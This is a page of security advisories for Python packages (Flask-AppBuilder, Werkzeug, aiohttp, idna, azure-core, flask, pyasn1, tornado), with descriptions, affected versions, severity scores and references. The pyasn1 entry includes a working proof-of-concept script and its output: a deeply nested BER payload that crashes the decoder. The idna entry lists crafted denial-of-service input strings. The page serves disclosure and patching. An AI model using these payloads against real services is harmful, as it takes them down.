"details": "### Impact\nWhen Flask-AppBuilder is configured to use OAuth, LDAP, or other non-database authentication methods, the password reset endpoint remains registered and accessible, despite not being displayed in the user interface. This allows an enabled user to reset their password and be able to create JWT tokens even after the user is disabled on the authentication provider.\n\n### Patches\nUpgrade to Flask-AppBuilder version 4.8.1 or later\n\n### Workarounds\nIf immediate upgrade is not possible:\n- Manually disable password reset routes in the application configuration\n- Implement additional access controls at the web server or proxy level to block access to the reset my password URL.\n- Monitor for suspicious password reset attempts from disabled accounts",
"id": "GHSA-765j-9r45-w2q2",
"modified": "2025-09-13T04:44:01Z",
"published": "2025-09-11T16:51:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-765j-9r45-w2q2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58065"
},
{
"type": "WEB",
"url": "https://github.com/dpgaspar/Flask-AppBuilder/pull/2384"
},
{
"type": "WEB",
"url": "https://github.com/dpgaspar/Flask-AppBuilder/commit/a942a9cc5775752f9a02f97fd8198dd288fa93ee"
},
{
"type": "PACKAGE",
"url": "https://github.com/dpgaspar/Flask-AppBuilder"
},
{
"type": "WEB",
"url": "https://github.com/dpgaspar/Flask-AppBuilder/releases/tag/v4.8.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Flask App Builder has an Authentication Bypass vulnerability when using non AUTH_DB methods"
}
GHSA-2G68-C3QC-8985
Vulnerability from github – Published: 2024-05-06 14:21 – Updated: 2025-02-21 21:00The debugger in affected versions of Werkzeug can allow an attacker to execute code on a developer's machine under some circumstances. This requires the attacker to get the developer to interact with a domain and subdomain they control, and enter the debugger PIN, but if they are successful it allows access to the debugger even if it is only running on localhost. This also requires the attacker to guess a URL in the developer's application that will trigger the debugger.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "Werkzeug"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-34069"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": true,
"github_reviewed_at": "2024-05-06T14:21:27Z",
"nvd_published_at": "2024-05-06T15:15:23Z",
"severity": "HIGH"
},
"details": "The debugger in affected versions of Werkzeug can allow an attacker to execute code on a developer\u0027s machine under some circumstances. This requires the attacker to get the developer to interact with a domain and subdomain they control, and enter the debugger PIN, but if they are successful it allows access to the debugger even if it is only running on localhost. This also requires the attacker to guess a URL in the developer\u0027s application that will trigger the debugger.",
"id": "GHSA-2g68-c3qc-8985",
"modified": "2025-02-21T21:00:47Z",
"published": "2024-05-06T14:21:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/security/advisories/GHSA-2g68-c3qc-8985"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34069"
},
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/commit/3386395b24c7371db11a5b8eaac0c91da5362692"
},
{
"type": "PACKAGE",
"url": "https://github.com/pallets/werkzeug"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00026.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/H4SH32AM3CTPMAAEOIDAN7VU565LO4IR"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HFERFN7PINV4MOGMGA3DPIXJPDCYOEJZ"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20240614-0004"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Werkzeug debugger vulnerable to remote execution when interacting with attacker controlled domain"
}
GHSA-27MF-GHQM-J3J8
Vulnerability from github – Published: 2024-11-18 21:02 – Updated: 2024-11-19 20:48Summary
A memory leak can occur when a request produces a MatchInfoError. This was caused by adding an entry to a cache on each request, due to the building of each MatchInfoError producing a unique cache entry.
Impact
If the user is making use of any middlewares with aiohttp.web then it is advisable to upgrade immediately.
An attacker may be able to exhaust the memory resources of a server by sending a substantial number (100,000s to millions) of such requests.
Patch: https://github.com/aio-libs/aiohttp/commit/bc15db61615079d1b6327ba42c682f758fa96936
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "3.10.6"
},
{
"fixed": "3.10.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-52303"
],
"database_specific": {
"cwe_ids": [
"CWE-772"
],
"github_reviewed": true,
"github_reviewed_at": "2024-11-18T21:02:17Z",
"nvd_published_at": "2024-11-18T20:15:06Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nA memory leak can occur when a request produces a `MatchInfoError`. This was caused by adding an entry to a cache on each request, due to the building of each `MatchInfoError` producing a unique cache entry.\n\n### Impact\n\nIf the user is making use of any middlewares with `aiohttp.web` then it is advisable to upgrade immediately.\n\nAn attacker may be able to exhaust the memory resources of a server by sending a substantial number (100,000s to millions) of such requests.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/bc15db61615079d1b6327ba42c682f758fa96936",
"id": "GHSA-27mf-ghqm-j3j8",
"modified": "2024-11-19T20:48:51Z",
"published": "2024-11-18T21:02:17Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-27mf-ghqm-j3j8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52303"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/bc15db61615079d1b6327ba42c682f758fa96936"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "aiohttp has a memory leak when middleware is enabled when requesting a resource with a non-allowed method"
}
GHSA-8495-4G3G-X7PR
Vulnerability from github – Published: 2024-11-18 21:02 – Updated: 2025-11-03 22:50Summary
The Python parser parses newlines in chunk extensions incorrectly which can lead to request smuggling vulnerabilities under certain conditions.
Impact
If a pure Python version of aiohttp is installed (i.e. without the usual C extensions) or AIOHTTP_NO_EXTENSIONS is enabled, then an attacker may be able to execute a request smuggling attack to bypass certain firewalls or proxy protections.
Patch: https://github.com/aio-libs/aiohttp/commit/259edc369075de63e6f3a4eaade058c62af0df71
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.10.10"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.10.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-52304"
],
"database_specific": {
"cwe_ids": [
"CWE-444"
],
"github_reviewed": true,
"github_reviewed_at": "2024-11-18T21:02:32Z",
"nvd_published_at": "2024-11-18T21:15:06Z",
"severity": "MODERATE"
},
"details": "### Summary\nThe Python parser parses newlines in chunk extensions incorrectly which can lead to request smuggling vulnerabilities under certain conditions.\n\n### Impact\nIf a pure Python version of aiohttp is installed (i.e. without the usual C extensions) or `AIOHTTP_NO_EXTENSIONS` is enabled, then an attacker may be able to execute a request smuggling attack to bypass certain firewalls or proxy protections.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/259edc369075de63e6f3a4eaade058c62af0df71",
"id": "GHSA-8495-4g3g-x7pr",
"modified": "2025-11-03T22:50:15Z",
"published": "2024-11-18T21:02:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-8495-4g3g-x7pr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52304"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/259edc369075de63e6f3a4eaade058c62af0df71"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00002.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
],
"summary": "aiohttp allows request smuggling due to incorrect parsing of chunk extensions"
}
GHSA-65PC-FJ4G-8RJX
Vulnerability from github – Published: 2026-05-19 14:34 – Updated: 2026-06-09 11:57This is the same issue as CVE-2024-3651, however the original remediation in 2024 was not a complete fix. Payloads such as "\u0660" * N or "\u30fb" * N + "\u6f22" utilize the valid_contexto function prior to length rejection, and for high values of N will take a long time to process.
Impact
A specially crafted argument to the idna.encode() function could consume significant resources. This may lead to a denial-of-service.
Patches
Starting in version 3.14, the function rejects long inputs as soon as practicable prior to any further processing to minimize resource consumption. In version 3.15, this approach was extended to lesser used alternate functions (i.e. per-label conversions and codec support).
Workarounds
Domain names cannot exceed 253 characters in length, if this length limit is enforced prior to passing the domain to the idna.encode() function it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "idna"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.15"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45409"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-19T14:34:32Z",
"nvd_published_at": "2026-06-05T23:16:43Z",
"severity": "MODERATE"
},
"details": "This is the same issue as CVE-2024-3651, however the original remediation in 2024 was not a complete fix. Payloads such as `\"\\u0660\" * N` or `\"\\u30fb\" * N + \"\\u6f22\"` utilize the `valid_contexto` function prior to length rejection, and for high values of `N` will take a long time to process.\n\n### Impact\nA specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service.\n\n### Patches\nStarting in version 3.14, the function rejects long inputs as soon as practicable prior to any further processing to minimize resource consumption. In version 3.15, this approach was extended to lesser used alternate functions (i.e. per-label conversions and codec support).\n\n### Workarounds\nDomain names cannot exceed 253 characters in length, if this length limit is enforced prior to passing the domain to the `idna.encode()` function it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application.",
"id": "GHSA-65pc-fj4g-8rjx",
"modified": "2026-06-09T11:57:15Z",
"published": "2026-05-19T14:34:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kjd/idna/security/advisories/GHSA-65pc-fj4g-8rjx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45409"
},
{
"type": "PACKAGE",
"url": "https://github.com/kjd/idna"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Internationalized Domain Names in Applications (IDNA): Specially crafted inputs to idna.encode() can bypass CVE-2024-3651 fix"
}
GHSA-JM66-CG57-JJV5
Vulnerability from github – Published: 2026-01-13 21:31 – Updated: 2026-01-13 21:57Deserialization of untrusted data in Azure Core shared client library for Python allows an authorized attacker to execute code over a network.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "azure-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.38.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-21226"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-13T21:57:47Z",
"nvd_published_at": "2026-01-13T19:16:23Z",
"severity": "HIGH"
},
"details": "Deserialization of untrusted data in Azure Core shared client library for Python allows an authorized attacker to execute code over a network.",
"id": "GHSA-jm66-cg57-jjv5",
"modified": "2026-01-13T21:57:47Z",
"published": "2026-01-13T21:31:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21226"
},
{
"type": "PACKAGE",
"url": "https://github.com/Azure/azure-sdk-for-python"
},
{
"type": "WEB",
"url": "https://github.com/Azure/azure-sdk-for-python/blob/6d2e6431ea0991861640e449e51e894247a7771a/sdk/core/azure-core/CHANGELOG.md#1380-2026-01-12"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21226"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Azure Core is vulnerable to deserialization of untrusted data"
}
GHSA-68RP-WP8R-4726
Vulnerability from github – Published: 2026-02-19 20:45 – Updated: 2026-02-23 22:28When the session object is accessed, Flask should set the Vary: Cookie header. This instructs caches not to cache the response, as it may contain information specific to a logged in user. This is handled in most cases, but some forms of access such as the Python in operator were overlooked.
The severity depends on the application's use of the session, and the cache's behavior regarding cookies. The risk depends on all these conditions being met.
- The application must be hosted behind a caching proxy that does not ignore responses with cookies.
- The application does not set a
Cache-Controlheader to indicate that a page is private or should not be cached. - The application accesses the session in a way that does not access the values, only the keys, and does not mutate the session.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "flask"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27205"
],
"database_specific": {
"cwe_ids": [
"CWE-524"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-19T20:45:41Z",
"nvd_published_at": "2026-02-21T06:17:00Z",
"severity": "LOW"
},
"details": "When the `session` object is accessed, Flask should set the `Vary: Cookie` header. This instructs caches not to cache the response, as it may contain information specific to a logged in user. This is handled in most cases, but some forms of access such as the Python `in` operator were overlooked.\n\nThe severity depends on the application\u0027s use of the session, and the cache\u0027s behavior regarding cookies. The risk depends on all these conditions being met.\n\n1. The application must be hosted behind a caching proxy that does not ignore responses with cookies.\n2. The application does not set a `Cache-Control` header to indicate that a page is private or should not be cached.\n3. The application accesses the session in a way that does not access the values, only the keys, and does not mutate the session.",
"id": "GHSA-68rp-wp8r-4726",
"modified": "2026-02-23T22:28:03Z",
"published": "2026-02-19T20:45:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pallets/flask/security/advisories/GHSA-68rp-wp8r-4726"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27205"
},
{
"type": "WEB",
"url": "https://github.com/pallets/flask/commit/089cb86dd22bff589a4eafb7ab8e42dc357623b4"
},
{
"type": "PACKAGE",
"url": "https://github.com/pallets/flask"
},
{
"type": "WEB",
"url": "https://github.com/pallets/flask/releases/tag/3.1.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Flask session does not add `Vary: Cookie` header when accessed in some ways"
}
GHSA-JR27-M4P2-RC6R
Vulnerability from github – Published: 2026-03-17 16:17 – Updated: 2026-05-01 18:31Summary
The pyasn1 library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested SEQUENCE (0x30) or SET (0x31) tags with Indefinite Length (0x80) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a RecursionError or consumes all available memory (OOM), crashing the host application.
Details
The vulnerability exists because the decoder iterates through the input stream and recursively calls decodeFun (the decoding callback) for every nested component found, without tracking or limiting the recursion depth.
Vulnerable Code Locations:
1. indefLenValueDecoder (Line 998):
for component in decodeFun(substrate, asn1Spec, allowEoo=True, **options):
This method handles indefinite-length constructed types. It sits inside a while True loop and recursively calls the decoder for every nested tag.
-
valueDecoder(Lines 786 and 907):for component in decodeFun(substrate, componentType, **options):This method handles standard decoding when a schema is present. It contains two distinct recursive calls that lack depth checks: Line 786: Recursively decodes components ofSEQUENCEorSETtypes. Line 907: Recursively decodes elements ofSEQUENCE OForSET OFtypes. -
_decodeComponentsSchemaless(Line 661):for component in decodeFun(substrate, **options):This method handles decoding when no schema is provided.
In all three cases, decodeFun is invoked without passing a depth parameter or checking against a global MAX_ASN1_NESTING limit.
PoC
import sys
from pyasn1.codec.ber import decoder
sys.setrecursionlimit(100000)
print("[*] Generating Recursion Bomb Payload...")
depth = 50_000
chunk = b'\x30\x80'
payload = chunk * depth
print(f"[*] Payload size: {len(payload) / 1024:.2f} KB")
print("[*] Triggering Decoder...")
try:
decoder.decode(payload)
except RecursionError:
print("[!] Crashed: Recursion Limit Hit")
except MemoryError:
print("[!] Crashed: Out of Memory")
except Exception as e:
print(f"[!] Crashed: {e}")
[*] Payload size: 9.77 KB
[*] Triggering Decoder...
[!] Crashed: Recursion Limit Hit
Impact
- This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (<100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion.
- Service Crash: Any service using
pyasn1to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely. - Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. A small payload (<200KB) can consume hundreds of megabytes of RAM or exhaust the stack.
Credits
Vulnerability discovered by Kevin Tu of TMIR at ByteDance.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.6.2"
},
"package": {
"ecosystem": "PyPI",
"name": "pyasn1"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.6.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-30922"
],
"database_specific": {
"cwe_ids": [
"CWE-674"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-17T16:17:33Z",
"nvd_published_at": "2026-03-18T04:17:18Z",
"severity": "HIGH"
},
"details": "### Summary\nThe `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with Indefinite Length (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application.\n\n### Details\nThe vulnerability exists because the decoder iterates through the input stream and recursively calls `decodeFun` (the decoding callback) for every nested component found, without tracking or limiting the recursion depth.\nVulnerable Code Locations:\n1. `indefLenValueDecoder` (Line 998):\n```for component in decodeFun(substrate, asn1Spec, allowEoo=True, **options):```\nThis method handles indefinite-length constructed types. It sits inside a `while True` loop and recursively calls the decoder for every nested tag.\n\n2. `valueDecoder` (Lines 786 and 907):\n```for component in decodeFun(substrate, componentType, **options):```\nThis method handles standard decoding when a schema is present. It contains two distinct recursive calls that lack depth checks: Line 786: Recursively decodes components of `SEQUENCE` or `SET` types. Line 907: Recursively decodes elements of `SEQUENCE OF` or `SET OF` types.\n\n4. `_decodeComponentsSchemaless` (Line 661):\n```for component in decodeFun(substrate, **options):```\nThis method handles decoding when no schema is provided.\n\nIn all three cases, `decodeFun` is invoked without passing a `depth` parameter or checking against a global `MAX_ASN1_NESTING` limit.\n\n### PoC\n```\nimport sys\nfrom pyasn1.codec.ber import decoder\n\nsys.setrecursionlimit(100000)\n\nprint(\"[*] Generating Recursion Bomb Payload...\")\ndepth = 50_000\nchunk = b\u0027\\x30\\x80\u0027 \npayload = chunk * depth\n\nprint(f\"[*] Payload size: {len(payload) / 1024:.2f} KB\")\nprint(\"[*] Triggering Decoder...\")\n\ntry:\n decoder.decode(payload)\nexcept RecursionError:\n print(\"[!] Crashed: Recursion Limit Hit\")\nexcept MemoryError:\n print(\"[!] Crashed: Out of Memory\")\nexcept Exception as e:\n print(f\"[!] Crashed: {e}\")\n```\n\n```\n[*] Payload size: 9.77 KB\n[*] Triggering Decoder...\n[!] Crashed: Recursion Limit Hit\n```\n\n### Impact\n- This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (\u003c100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion.\n- Service Crash: Any service using `pyasn1` to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely.\n- Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. A small payload (\u003c200KB) can consume hundreds of megabytes of RAM or exhaust the stack.\n\n### Credits\nVulnerability discovered by Kevin Tu of TMIR at ByteDance.",
"id": "GHSA-jr27-m4p2-rc6r",
"modified": "2026-05-01T18:31:19Z",
"published": "2026-03-17T16:17:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30922"
},
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0"
},
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/commit/5a49bd1fe93b5b866a1210f6bf0a3924f21572c8"
},
{
"type": "PACKAGE",
"url": "https://github.com/pyasn1/pyasn1"
},
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.3"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2026/05/msg00001.html"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/03/20/4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Denial of Service in pyasn1 via Unbounded Recursion"
}
GHSA-8W49-H785-MJ3C
Vulnerability from github – Published: 2024-11-22 20:26 – Updated: 2025-11-04 16:54The algorithm used for parsing HTTP cookies in Tornado versions prior to 6.4.2 sometimes has quadratic complexity, leading to excessive CPU consumption when parsing maliciously-crafted cookie headers. This parsing occurs in the event loop thread and may block the processing of other requests.
See also CVE-2024-7592 for a similar vulnerability in cpython.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.4.1"
},
"package": {
"ecosystem": "PyPI",
"name": "tornado"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.4.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-52804"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2024-11-22T20:26:41Z",
"nvd_published_at": "2024-11-22T16:15:34Z",
"severity": "HIGH"
},
"details": "The algorithm used for parsing HTTP cookies in Tornado versions prior to 6.4.2 sometimes has quadratic complexity, leading to excessive CPU consumption when parsing maliciously-crafted cookie headers. This parsing occurs in the event loop thread and may block the processing of other requests.\n\nSee also CVE-2024-7592 for a similar vulnerability in cpython.",
"id": "GHSA-8w49-h785-mj3c",
"modified": "2025-11-04T16:54:32Z",
"published": "2024-11-22T20:26:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-8w49-h785-mj3c"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52804"
},
{
"type": "WEB",
"url": "https://github.com/tornadoweb/tornado/commit/d5ba4a1695fbf7c6a3e54313262639b198291533"
},
{
"type": "PACKAGE",
"url": "https://github.com/tornadoweb/tornado"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00000.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Tornado has an HTTP cookie parsing DoS vulnerability"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.